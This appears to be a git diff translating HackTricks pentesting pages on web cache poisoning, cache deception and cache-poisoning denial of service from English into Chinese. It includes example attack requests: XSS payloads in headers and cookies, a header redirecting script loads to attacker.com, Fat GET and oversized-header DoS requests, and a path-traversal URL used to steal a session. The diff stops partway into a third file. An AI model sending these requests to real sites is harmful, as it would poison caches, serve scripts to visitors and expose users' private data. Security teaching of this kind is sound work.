-> **What is the difference between web cache poisoning and web cache deception?**
+> **Web缓存中毒和Web缓存欺骗之间有什么区别？**
 >
-> - In **web cache poisoning**, the attacker causes the application to store some malicious content in the cache, and this content is served from the cache to other application users.
-> - In **web cache deception**, the attacker causes the application to store some sensitive content belonging to another user in the cache, and the attacker then retrieves this content from the cache.
+> - 在 **Web缓存中毒** 中，攻击者使应用程序在缓存中存储一些恶意内容，并且这些内容从缓存中提供给其他应用程序用户。
+> - 在 **Web缓存欺骗** 中，攻击者使应用程序在缓存中存储属于另一个用户的一些敏感内容，然后攻击者从缓存中检索这些内容。
 
-## Cache Poisoning
+## 缓存中毒
 
-Cache poisoning is aimed at manipulating the client-side cache to force clients to load resources that are unexpected, partial, or under the control of an attacker. The extent of the impact is contingent on the popularity of the affected page, as the tainted response is served exclusively to users visiting the page during the period of cache contamination.
+缓存中毒旨在操纵客户端缓存，强迫客户端加载意外、部分或在攻击者控制下的资源。影响的程度取决于受影响页面的受欢迎程度，因为被污染的响应仅在缓存污染期间提供给访问该页面的用户。
 
-The execution of a cache poisoning assault involves several steps:
+执行缓存中毒攻击涉及几个步骤：
 
-1. **Identification of Unkeyed Inputs**: These are parameters that, although not required for a request to be cached, can alter the response returned by the server. Identifying these inputs is crucial as they can be exploited to manipulate the cache.
-2. **Exploitation of the Unkeyed Inputs**: After identifying the unkeyed inputs, the next step involves figuring out how to misuse these parameters to modify the server's response in a way that benefits the attacker.
-3. **Ensuring the Poisoned Response is Cached**: The final step is to ensure that the manipulated response is stored in the cache. This way, any user accessing the affected page while the cache is poisoned will receive the tainted response.
+1. **识别未键入的输入**：这些是参数，尽管不是缓存请求所必需的，但可以改变服务器返回的响应。识别这些输入至关重要，因为它们可以被利用来操纵缓存。
+2. **利用未键入的输入**：在识别未键入的输入后，下一步是弄清楚如何滥用这些参数，以修改服务器的响应，从而使攻击者受益。
+3. **确保被污染的响应被缓存**：最后一步是确保被操纵的响应被存储在缓存中。这样，任何在缓存被污染时访问受影响页面的用户将收到被污染的响应。
 
-### Discovery: Check HTTP headers
+### 发现：检查HTTP头
 
-Usually, when a response was **stored in the cache** there will be a **header indicating so**, you can check which headers you should pay attention to in this post: [**HTTP Cache headers**](../../network-services-pentesting/pentesting-web/special-http-headers.md#cache-headers).
+通常，当响应被 **存储在缓存中** 时，会有一个 **指示的头**，您可以在此帖子中检查您应该关注哪些头：[**HTTP缓存头**](../../network-services-pentesting/pentesting-web/special-http-headers.md#cache-headers)。
 
-### Discovery: Caching error codes
+### 发现：缓存错误代码
 
-If you are thinking that the response is being stored in a cache, you could try to **send requests with a bad header**, which should be responded to with a **status code 400**. Then try to access the request normally and if the **response is a 400 status code**, you know it's vulnerable (and you could even perform a DoS).
+如果您认为响应正在被存储在缓存中，您可以尝试 **发送带有错误头的请求**，这应该会以 **状态代码400** 响应。然后尝试正常访问请求，如果 **响应是400状态代码**，您就知道它是脆弱的（您甚至可以执行DoS）。
 
-You can find more options in:
+您可以在以下位置找到更多选项：
 
 {{#ref}}
 cache-poisoning-to-dos.md
 {{#endref}}
 
-However, note that **sometimes these kinds of status codes aren't cached** so this test could not be reliable.
+但是，请注意 **有时这些状态代码不会被缓存**，因此此测试可能不可靠。
 
-### Discovery: Identify and evaluate unkeyed inputs
-
-You could use [**Param Miner**](https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943) to **brute-force parameters and headers** that may be **changing the response of the page**. For example, a page may be using the header `X-Forwarded-For` to indicate the client to load the script from there:
+### 发现：识别和评估未键入的输入
 
+您可以使用 [**Param Miner**](https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943) 来 **暴力破解参数和头**，这些可能会 **改变页面的响应**。例如，一个页面可能使用头 `X-Forwarded-For` 来指示客户端从那里加载脚本：
 ```markup
 <script type="text/javascript" src="//<X-Forwarded-For_value>/resources/js/tracking.js"></script>
 ```
+### 引发后端服务器的有害响应
 
-### Elicit a harmful response from the back-end server
+在识别出参数/头部后，检查它是如何被**清理**的，以及它**在哪里**被**反映**或影响响应。你能以任何方式滥用它吗（执行XSS或加载你控制的JS代码？执行DoS？...）
 
-With the parameter/header identified check how it is being **sanitised** and **where** is it **getting reflected** or affecting the response from the header. Can you abuse it anyway (perform an XSS or load a JS code controlled by you? perform a DoS?...)
+### 获取响应缓存
 
-### Get the response cached
+一旦你**识别**出可以被滥用的**页面**，使用哪个**参数**/**头部**以及**如何**滥用它，你需要将页面缓存。根据你尝试缓存的资源，这可能需要一些时间，你可能需要尝试几秒钟。
 
-Once you have **identified** the **page** that can be abused, which **parameter**/**header** to use and **how** to **abuse** it, you need to get the page cached. Depending on the resource you are trying to get in the cache this could take some time, you might need to be trying for several seconds.
+响应中的头部**`X-Cache`**可能非常有用，因为当请求未被缓存时，它的值可能是**`miss`**，而当它被缓存时，值为**`hit`**。\
+头部**`Cache-Control`**也很有趣，可以知道资源是否被缓存，以及下次资源将何时再次被缓存：`Cache-Control: public, max-age=1800`
 
-The header **`X-Cache`** in the response could be very useful as it may have the value **`miss`** when the request wasn't cached and the value **`hit`** when it is cached.\
-The header **`Cache-Control`** is also interesting to know if a resource is being cached and when will be the next time the resource will be cached again: `Cache-Control: public, max-age=1800`
+另一个有趣的头部是**`Vary`**。这个头部通常用于**指示额外的头部**，这些头部被视为**缓存键的一部分**，即使它们通常没有键。因此，如果用户知道他所针对的受害者的`User-Agent`，他可以为使用该特定`User-Agent`的用户毒化缓存。
 
-Another interesting header is **`Vary`**. This header is often used to **indicate additional headers** that are treated as **part of the cache key** even if they are normally unkeyed. Therefore, if the user knows the `User-Agent` of the victim he is targeting, he can poison the cache for the users using that specific `User-Agent`.
+与缓存相关的另一个头部是**`Age`**。它定义了对象在代理缓存中存在的时间（以秒为单位）。
 
-One more header related to the cache is **`Age`**. It defines the times in seconds the object has been in the proxy cache.
+在缓存请求时，要**小心使用的头部**，因为其中一些可能会被**意外使用**为**键**，而**受害者需要使用相同的头部**。始终使用**不同的浏览器测试**缓存中毒是否有效。
 
-When caching a request, be **careful with the headers you use** because some of them could be **used unexpectedly** as **keyed** and the **victim will need to use that same header**. Always **test** a Cache Poisoning with **different browsers** to check if it's working.
+## 利用示例
 
-## Exploiting Examples
-
-### Easiest example
-
-A header like `X-Forwarded-For` is being reflected in the response unsanitized.\
-You can send a basic XSS payload and poison the cache so everybody that accesses the page will be XSSed:
+### 最简单的示例
 
+像`X-Forwarded-For`这样的头部在响应中未经过清理地被反映。\
+你可以发送一个基本的XSS有效负载并毒化缓存，这样每个访问该页面的人都会受到XSS攻击：
 ```markup
 GET /en?region=uk HTTP/1.1
 Host: innocent-website.com
 X-Forwarded-Host: a."><script>alert(1)</script>"
 ```
+_注意，这将使请求变得无效到 `/en?region=uk` 而不是 `/en`_
 
-_Note that this will poison a request to `/en?region=uk` not to `/en`_
-
-### Cache poisoning to DoS
+### 缓存中毒导致拒绝服务
 
 {{#ref}}
 cache-poisoning-to-dos.md
 {{#endref}}
 
-### Using web cache poisoning to exploit cookie-handling vulnerabilities
-
-Cookies could also be reflected on the response of a page. If you can abuse it to cause a XSS for example, you could be able to exploit XSS in several clients that load the malicious cache response.
+### 使用网络缓存中毒来利用 cookie 处理漏洞
 
+Cookies 也可能在页面的响应中被反射。如果你能利用它造成 XSS，例如，你可能能够在加载恶意缓存响应的多个客户端中利用 XSS。
 ```markup
 GET / HTTP/1.1
 Host: vulnerable.com
 Cookie: session=VftzO7ZtiBj5zNLRAuFpXpSQLjS4lBmU; fehost=asd"%2balert(1)%2b"
 ```
+注意，如果易受攻击的 cookie 被用户频繁使用，常规请求将清除缓存。
 
-Note that if the vulnerable cookie is very used by the users, regular requests will be cleaning the cache.
+### 使用分隔符、规范化和点生成差异 <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
 
-### Generating discrepancies with delimiters, normalization and dots <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
-
-Check:
+检查：
 
 {{#ref}}
 cache-poisoning-via-url-discrepancies.md
 {{#endref}}
 
-### Cache poisoning with path traversal to steal API key <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
+### 通过路径遍历进行缓存污染以窃取 API 密钥 <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
 
-[**This writeup explains**](https://nokline.github.io/bugbounty/2024/02/04/ChatGPT-ATO.html) how it was possible to steal an OpenAI API key with an URL like `https://chat.openai.com/share/%2F..%2Fapi/auth/session?cachebuster=123` because anything matching `/share/*` will be cached without Cloudflare normalising the URL, which was done when the request reached the web server.
+[**这篇文章解释了**](https://nokline.github.io/bugbounty/2024/02/04/ChatGPT-ATO.html) 如何通过类似 `https://chat.openai.com/share/%2F..%2Fapi/auth/session?cachebuster=123` 的 URL 窃取 OpenAI API 密钥，因为任何匹配 `/share/*` 的内容都会被缓存，而 Cloudflare 在请求到达 web 服务器时并未对 URL 进行规范化。
 
-This is also explained better in:
+这在以下内容中也有更好的解释：
 
 {{#ref}}
 cache-poisoning-via-url-discrepancies.md
 {{#endref}}
 
-### Using multiple headers to exploit web cache poisoning vulnerabilities <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
-
-Sometimes you will need to **exploit several unkeyed inputs** to be able to abuse a cache. For example, you may find an **Open redirect** if you set `X-Forwarded-Host` to a domain controlled by you and `X-Forwarded-Scheme` to `http`.**If** the **server** is **forwarding** all the **HTTP** requests **to HTTPS** and using the header `X-Forwarded-Scheme` as the domain name for the redirect. You can control where the page is pointed by the redirect.
+### 使用多个头部利用 web 缓存污染漏洞 <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
 
+有时您需要 **利用多个未键入的输入** 来滥用缓存。例如，如果您将 `X-Forwarded-Host` 设置为您控制的域名，并将 `X-Forwarded-Scheme` 设置为 `http`，您可能会发现一个 **开放重定向**。**如果** 服务器 **将** 所有 **HTTP** 请求 **转发** 到 **HTTPS** 并使用头部 `X-Forwarded-Scheme` 作为重定向的域名。您可以控制重定向指向的页面。
 ```markup
 GET /resources/js/tracking.js HTTP/1.1
 Host: acc11fe01f16f89c80556c2b0056002e.web-security-academy.net
 X-Forwarded-Host: ac8e1f8f1fb1f8cb80586c1d01d500d3.web-security-academy.net/
 X-Forwarded-Scheme: http
 ```
+### 利用有限的 `Vary` 头
 
-### Exploiting with limited `Vary`header
-
-If you found that the **`X-Host`** header is being used as **domain name to load a JS resource** but the **`Vary`** header in the response is indicating **`User-Agent`**. Then, you need to find a way to exfiltrate the User-Agent of the victim and poison the cache using that user agent:
-
+如果你发现 **`X-Host`** 头被用作 **加载 JS 资源的域名**，但响应中的 **`Vary`** 头指示 **`User-Agent`**。那么，你需要找到一种方法来提取受害者的 User-Agent 并使用该用户代理来污染缓存：
 ```markup
 GET / HTTP/1.1
 Host: vulnerbale.net
 User-Agent: THE SPECIAL USER-AGENT OF THE VICTIM
 X-Host: attacker.com
 ```
-
 ### Fat Get
 
-Send a GET request with the request in the URL and in the body. If the web server uses the one from the body but the cache server caches the one from the URL, anyone accessing that URL will actually use the parameter from the body. Like the vuln James Kettle found at the Github website:
-
+发送一个带有请求的GET请求，URL和请求体中都包含该请求。如果web服务器使用请求体中的内容，但缓存服务器缓存的是URL中的内容，那么任何访问该URL的人实际上将使用请求体中的参数。就像James Kettle在Github网站上发现的漏洞：
 ```
 GET /contact/report-abuse?report=albinowax HTTP/1.1
 Host: github.com
@@ -153,91 +142,90 @@ Content-Length: 22
 
 report=innocent-victim
 ```
+有一个关于此的portswigger实验室：[https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get)
 
-There it a portswigger lab about this: [https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get)
+### 参数伪装
 
-### Parameter Cloacking
+例如，在ruby服务器中，可以使用字符**`;`**而不是**`&`**来分隔**参数**。这可以用来将无键参数值放入有键参数中并进行滥用。
 
-For example it's possible to separate **parameters** in ruby servers using the char **`;`** instead of **`&`**. This could be used to put unkeyed parameters values inside keyed ones and abuse them.
+Portswigger实验室：[https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-param-cloaking](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-param-cloaking)
 
-Portswigger lab: [https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-param-cloaking](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-param-cloaking)
+### 通过滥用HTTP请求走私来利用HTTP缓存中毒
 
-### Exploiting HTTP Cache Poisoning by abusing HTTP Request Smuggling
+在这里了解如何通过滥用[HTTP请求走私进行缓存中毒攻击](../http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-poisoning)。
 
-Learn here about how to perform [Cache Poisoning attacks by abusing HTTP Request Smuggling](../http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-poisoning).
+### Web缓存中毒的自动化测试
 
-### Automated testing for Web Cache Poisoning
+[Web Cache Vulnerability Scanner](https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner)可以用于自动测试Web缓存中毒。它支持多种不同的技术，并且高度可定制。
 
-The [Web Cache Vulnerability Scanner](https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner) can be used to automatically test for web cache poisoning. It supports many different techniques and is highly customizable.
+示例用法：`wcvs -u example.com`
 
-Example usage: `wcvs -u example.com`
-
-## Vulnerable Examples
+## 漏洞示例
 
 ### Apache Traffic Server ([CVE-2021-27577](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27577))
 
-ATS forwarded the fragment inside the URL without stripping it and generated the cache key only using the host, path and query (ignoring the fragment). So the request `/#/../?r=javascript:alert(1)` was sent to the backend as `/#/../?r=javascript:alert(1)` and the cache key didn't have the payload inside of it, only host, path and query.
+ATS在不剥离URL中的片段的情况下转发了片段，并仅使用主机、路径和查询生成缓存键（忽略片段）。因此，请求`/#/../?r=javascript:alert(1)`被发送到后端，作为`/#/../?r=javascript:alert(1)`，而缓存键中没有有效负载，只有主机、路径和查询。
 
 ### GitHub CP-DoS
 
-Sending a bad value in the content-type header triggered a 405 cached response. The cache key contained the cookie so it was possible only to attack unauth users.
+在content-type头中发送错误值触发了405缓存响应。缓存键包含cookie，因此只能攻击未授权用户。
 
 ### GitLab + GCP CP-DoS
 
-GitLab uses GCP buckets to store static content. **GCP Buckets** support the **header `x-http-method-override`**. So it was possible to send the header `x-http-method-override: HEAD` and poison the cache into returning an empty response body. It could also support the method `PURGE`.
+GitLab使用GCP存储桶来存储静态内容。**GCP存储桶**支持**头部`x-http-method-override`**。因此，可以发送头部`x-http-method-override: HEAD`并使缓存返回空响应体。它还可以支持`PURGE`方法。
 
-### Rack Middleware (Ruby on Rails)
+### Rack中间件（Ruby on Rails）
 
-In Ruby on Rails applications, Rack middleware is often utilized. The purpose of the Rack code is to take the value of the **`x-forwarded-scheme`** header and set it as the request's scheme. When the header `x-forwarded-scheme: http` is sent, a 301 redirect to the same location occurs, potentially causing a Denial of Service (DoS) to that resource. Additionally, the application might acknowledge the `X-forwarded-host` header and redirect users to the specified host. This behavior can lead to the loading of JavaScript files from an attacker's server, posing a security risk.
+在Ruby on Rails应用程序中，通常使用Rack中间件。Rack代码的目的是获取**`x-forwarded-scheme`**头的值并将其设置为请求的方案。当发送头`x-forwarded-scheme: http`时，会发生301重定向到相同位置，可能导致该资源的拒绝服务（DoS）。此外，应用程序可能会识别`X-forwarded-host`头并将用户重定向到指定主机。这种行为可能导致从攻击者的服务器加载JavaScript文件，构成安全风险。
 
-### 403 and Storage Buckets
+### 403和存储桶
 
-Cloudflare previously cached 403 responses. Attempting to access S3 or Azure Storage Blobs with incorrect Authorization headers would result in a 403 response that got cached. Although Cloudflare has stopped caching 403 responses, this behavior might still be present in other proxy services.
+Cloudflare之前缓存了403响应。尝试使用不正确的授权头访问S3或Azure存储Blob将导致403响应被缓存。尽管Cloudflare已停止缓存403响应，但这种行为可能仍然存在于其他代理服务中。
 
-### Injecting Keyed Parameters
+### 注入键参数
 
-Caches often include specific GET parameters in the cache key. For instance, Fastly's Varnish cached the `size` parameter in requests. However, if a URL-encoded version of the parameter (e.g., `siz%65`) was also sent with an erroneous value, the cache key would be constructed using the correct `size` parameter. Yet, the backend would process the value in the URL-encoded parameter. URL-encoding the second `size` parameter led to its omission by the cache but its utilization by the backend. Assigning a value of 0 to this parameter resulted in a cacheable 400 Bad Request error.
+缓存通常在缓存键中包含特定的GET参数。例如，Fastly的Varnish在请求中缓存了`size`参数。然而，如果还发送了一个带有错误值的参数的URL编码版本（例如，`siz%65`），缓存键将使用正确的`size`参数构建。然而，后端将处理URL编码参数中的值。对第二个`size`参数进行URL编码导致缓存省略它，但后端使用了它。将该参数的值设置为0导致可缓存的400错误请求。
 
-### User Agent Rules
+### 用户代理规则
 
-Some developers block requests with user-agents matching those of high-traffic tools like FFUF or Nuclei to manage server load. Ironically, this approach can introduce vulnerabilities such as cache poisoning and DoS.
+一些开发人员阻止与高流量工具（如FFUF或Nuclei）匹配的用户代理的请求，以管理服务器负载。讽刺的是，这种方法可能引入漏洞，例如缓存中毒和DoS。
 
-### Illegal Header Fields
+### 非法头字段
 
-The [RFC7230](https://datatracker.ietf.mrg/doc/html/rfc7230) specifies the acceptable characters in header names. Headers containing characters outside of the specified **tchar** range should ideally trigger a 400 Bad Request response. In practice, servers don't always adhere to this standard. A notable example is Akamai, which forwards headers with invalid characters and caches any 400 error, as long as the `cache-control` header is not present. An exploitable pattern was identified where sending a header with an illegal character, such as `\`, would result in a cacheable 400 Bad Request error.
+[RFC7230](https://datatracker.ietf.mrg/doc/html/rfc7230)规定了头名称中可接受的字符。包含超出指定**tchar**范围的字符的头理想情况下应触发400错误请求响应。在实践中，服务器并不总是遵循此标准。一个显著的例子是Akamai，它转发包含无效字符的头，并缓存任何400错误，只要`cache-control`头不存在。发现了一种可利用的模式，发送带有非法字符（如`\`）的头将导致可缓存的400错误请求。
 
-### Finding new headers
+### 查找新头
 
 [https://gist.github.com/iustin24/92a5ba76ee436c85716f003dda8eecc6](https://gist.github.com/iustin24/92a5ba76ee436c85716f003dda8eecc6)
 
-## Cache Deception
+## 缓存欺骗
 
-The goal of Cache Deception is to make clients **load resources that are going to be saved by the cache with their sensitive information**.
+缓存欺骗的目标是使客户端**加载将被缓存保存的敏感信息的资源**。
 
-First of all note that **extensions** such as `.css`, `.js`, `.png` etc are usually **configured** to be **saved** in the **cache.** Therefore, if you access `www.example.com/profile.php/nonexistent.js` the cache will probably store the response because it sees the `.js` **extension**. But, if the **application** is **replaying** with the **sensitive** user contents stored in _www.example.com/profile.php_, you can **steal** those contents from other users.
+首先要注意的是，**扩展名**如`.css`、`.js`、`.png`等通常被**配置**为**保存**在**缓存**中。因此，如果您访问`www.example.com/profile.php/nonexistent.js`，缓存可能会存储响应，因为它看到`.js`**扩展名**。但是，如果**应用程序**正在**重放**存储在_www.example.com/profile.php_中的**敏感**用户内容，您可以从其他用户那里**窃取**这些内容。
 
-Other things to test:
+其他测试内容：
 
 - _www.example.com/profile.php/.js_
 - _www.example.com/profile.php/.css_
 - _www.example.com/profile.php/test.js_
 - _www.example.com/profile.php/../test.js_
 - _www.example.com/profile.php/%2e%2e/test.js_
-- _Use lesser known extensions such as_ `.avif`
+- _使用不太常见的扩展名，如_`.avif`
 
-Another very clear example can be found in this write-up: [https://hackerone.com/reports/593712](https://hackerone.com/reports/593712).\
-In the example, it is explained that if you load a non-existent page like _http://www.example.com/home.php/non-existent.css_ the content of _http://www.example.com/home.php_ (**with the user's sensitive information**) is going to be returned and the cache server is going to save the result.\
-Then, the **attacker** can access _http://www.example.com/home.php/non-existent.css_ in their own browser and observe the **confidential information** of the users that accessed before.
+另一个非常清晰的例子可以在这篇文章中找到：[https://hackerone.com/reports/593712](https://hackerone.com/reports/593712)。\
+在这个例子中，解释了如果您加载一个不存在的页面，如_http://www.example.com/home.php/non-existent.css_，将返回_http://www.example.com/home.php_（**带有用户的敏感信息**）的内容，并且缓存服务器将保存结果。\
+然后，**攻击者**可以在自己的浏览器中访问_http://www.example.com/home.php/non-existent.css_并观察之前访问过的用户的**机密信息**。
 
-Note that the **cache proxy** should be **configured** to **cache** files **based** on the **extension** of the file (_.css_) and not base on the content-type. In the example _http://www.example.com/home.php/non-existent.css_ will have a `text/html` content-type instead of a `text/css` mime type (which is the expected for a _.css_ file).
+请注意，**缓存代理**应被**配置**为根据文件的**扩展名**（_.css_）而不是根据内容类型来**缓存**文件。在示例_http://www.example.com/home.php/non-existent.css_中，将具有`text/html`内容类型，而不是`text/css` MIME类型（这是_.css_文件的预期）。
 
-Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request Smuggling](../http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-deception).
+在这里了解如何通过滥用HTTP请求走私进行[缓存欺骗攻击](../http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-deception)。
 
-## Automatic Tools
+## 自动化工具
 
-- [**toxicache**](https://github.com/xhzeem/toxicache): Golang scanner to find web cache poisoning vulnerabilities in a list of URLs and test multiple injection techniques.
+- [**toxicache**](https://github.com/xhzeem/toxicache)：Golang扫描器，用于在URL列表中查找Web缓存中毒漏洞并测试多种注入技术。
 
-## References
+## 参考文献
 
 - [https://portswigger.net/web-security/web-cache-poisoning](https://portswigger.net/web-security/web-cache-poisoning)
 - [https://portswigger.net/web-security/web-cache-poisoning/exploiting#using-web-cache-poisoning-to-exploit-cookie-handling-vulnerabilities](https://portswigger.net/web-security/web-cache-poisoning/exploiting#using-web-cache-poisoning-to-exploit-cookie-handling-vulnerabilities)
@@ -249,10 +237,9 @@ Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request S
 <figure><img src="../../images/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=cache-deception) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用[**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=cache-deception)轻松构建和**自动化工作流**，由世界上**最先进**的社区工具提供支持。\
+今天获取访问权限：
 
 {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=cache-deception" %}
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/cache-deception/cache-poisoning-to-dos.md b/src/pentesting-web/cache-deception/cache-poisoning-to-dos.md
index 9002e1464..fe24097cd 100644
--- a/src/pentesting-web/cache-deception/cache-poisoning-to-dos.md
+++ b/src/pentesting-web/cache-deception/cache-poisoning-to-dos.md
@@ -3,42 +3,35 @@
 {{#include ../../banners/hacktricks-training.md}}
 
 > [!CAUTION]
-> In this page you can find different variations to try to make the **web server respond with errors** to requests that are **valid for the cache servers**
+> 在此页面中，您可以找到不同的变体，以尝试使 **web 服务器对有效的缓存服务器请求** 返回错误
 
 - **HTTP Header Oversize (HHO)**
 
-Send a request with a header size larger than the one supported by the web server but smaller than the one supported by the cache server. The web server will respond with a 400 response which might be cached:
-
+发送一个头部大小大于 web 服务器支持的大小，但小于缓存服务器支持的大小的请求。web 服务器将返回一个 400 响应，该响应可能会被缓存：
 ```
 GET / HTTP/1.1
 Host: redacted.com
 X-Oversize-Hedear:Big-Value-000000000000000
 ```
-
 - **HTTP Meta Character (HMC) & Unexpected values**
 
-Send a header that contain some **harmfull meta characters** such as and . In order the attack to work you must bypass the cache first.
-
+发送一个包含一些**有害元字符**的头，例如和。在攻击生效之前，您必须先绕过缓存。
 ```
 GET / HTTP/1.1
 Host: redacted.com
 X-Meta-Hedear:Bad Chars\n \r
 ```
+一个配置不当的头部可能仅仅是 `\:` 作为头部。
 
-A badly configured header could be just `\:` as a header.
-
-This could also work if unexpected values are sent, like an unexpected Content-Type:
-
+如果发送了意外的值，例如意外的 Content-Type:，这也可能有效。
 ```
 GET /anas/repos HTTP/2
 Host: redacted.com
 Content-Type: HelloWorld
 ```
+- **无密钥头**
 
-- **Unkeyed header**
-
-Some websites will return an error status code if they **see some specific headers i**n the request like with the _X-Amz-Website-Location-Redirect: someThing_ header:
-
+一些网站会在请求中看到某些特定的头时返回错误状态代码，例如带有 _X-Amz-Website-Location-Redirect: someThing_ 头的请求：
 ```
 GET /app.js HTTP/2
 Host: redacted.com
@@ -49,21 +42,17 @@ Cache: hit
 
 Invalid Header
 ```
+- **HTTP 方法覆盖攻击 (HMO)**
 
-- **HTTP Method Override Attack (HMO)**
-
-If the server supports changing the HTTP method with headers such as `X-HTTP-Method-Override`, `X-HTTP-Method` or `X-Method-Override`. It's possible to request a valid page changing the method so the server doesn't supports it so a bad response gets cached:
-
+如果服务器支持使用诸如 `X-HTTP-Method-Override`、`X-HTTP-Method` 或 `X-Method-Override` 的头部更改 HTTP 方法。可以通过更改方法请求有效页面，以便服务器不支持它，从而缓存错误响应：
 ```
 GET /blogs HTTP/1.1
 Host: redacted.com
 HTTP-Method-Override: POST
 ```
+- **无键端口**
 
-- **Unkeyed Port**
-
-If port in the Host header is reflected in the response and not included in the cache key, it's possible to redirect it to an unused port:
-
+如果主机头中的端口在响应中被反射且未包含在缓存键中，则可以将其重定向到未使用的端口：
 ```
 GET /index.html HTTP/1.1
 Host: redacted.com:1
@@ -72,11 +61,9 @@ HTTP/1.1 301 Moved Permanently
 Location: https://redacted.com:1/en/index.html
 Cache: miss
 ```
+- **长重定向 DoS**
 
-- **Long Redirect DoS**
-
-Like in the following example, x is not being cached, so an attacker could abuse the redirect response behaviour to make the redirect send a URL so big that it returns an error. Then, people trying to access the URL without the uncached x key will get the error response:
-
+如以下示例所示，x 没有被缓存，因此攻击者可以利用重定向响应行为，使重定向发送一个如此大的 URL 以至于返回错误。然后，试图访问没有未缓存的 x 键的 URL 的人将收到错误响应：
 ```
 GET /login?x=veryLongUrl HTTP/1.1
 Host: www.cloudflare.com
@@ -91,11 +78,9 @@ Host: www.cloudflare.com
 HTTP/1.1 414 Request-URI Too Large
 CF-Cache-Status: miss
 ```
+- **主机头部大小写规范化**
 
-- **Host header case normalization**
-
-The host header should be case insensitive but some websites expect it to be lowercase returning an error if it's not:
-
+主机头部应该是不区分大小写的，但有些网站期望它是小写的，如果不是则会返回错误：
 ```
 GET /img.png HTTP/1.1
 Host: Cdn.redacted.com
@@ -105,11 +90,9 @@ Cache:miss
 
 Not Found
 ```
+- **路径规范化**
 
-- **Path normalization**
-
-Some pages will return error codes sending data URLencode in the path, however, the cache server with URLdecode the path and store the response for the URLdecoded path:
-
+某些页面在路径中发送数据 URLencode 时会返回错误代码，但缓存服务器会对路径进行 URLdecode 并存储 URLdecoded 路径的响应：
 ```
 GET /api/v1%2e1/user HTTP/1.1
 Host: redacted.com
@@ -120,11 +103,9 @@ Cach:miss
 
 Not Found
 ```
-
 - **Fat Get**
 
-Some cache servers, like Cloudflare, or web servers, stops GET requests with a body, so this could be abused to cache a invalid response:
-
+一些缓存服务器，如 Cloudflare，或 web 服务器，停止带有主体的 GET 请求，因此这可能被滥用来缓存无效响应：
 ```
 GET /index.html HTTP/2
 Host: redacted.com
@@ -136,11 +117,9 @@ xyz
 HTTP/2 403 Forbidden
 Cache: hit
 ```
-
-## References
+## 参考文献
 
 - [https://anasbetis023.medium.com/dont-trust-the-cache-exposing-web-cache-poisoning-and-deception-vulnerabilities-3a829f221f52](https://anasbetis023.medium.com/dont-trust-the-cache-exposing-web-cache-poisoning-and-deception-vulnerabilities-3a829f221f52)
 - [https://youst.in/posts/cache-poisoning-at-scale/?source=post_page-----3a829f221f52--------------------------------](https://youst.in/posts/cache-poisoning-at-scale/?source=post_page-----3a829f221f52--------------------------------)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/cache-deception/cache-poisoning-via-url-discrepancies.md b/src/pentesting-web/cache-deception/cache-poisoning-via-url-discrepancies.md
index a3b1464f1..f214c3946 100644
--- a/src/pentesting-web/cache-deception/cache-poisoning-via-url-discrepancies.md
+++ b/src/pentesting-web/cache-deception/cache-poisoning-via-url-discrepancies.md
@@ -2,52 +2,51 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-This is a summary of the techniques proposed in the post [https://portswigger.net/research/gotta-cache-em-all](https://portswigger.net/research/gotta-cache-em-all) in order to perform cache poisoning attacks **abusing discrepancies between cache proxies and web servers.**
+这是对帖子中提出的技术的总结 [https://portswigger.net/research/gotta-cache-em-all](https://portswigger.net/research/gotta-cache-em-all)，目的是执行缓存中毒攻击 **利用缓存代理和Web服务器之间的差异。**
 
 > [!NOTE]
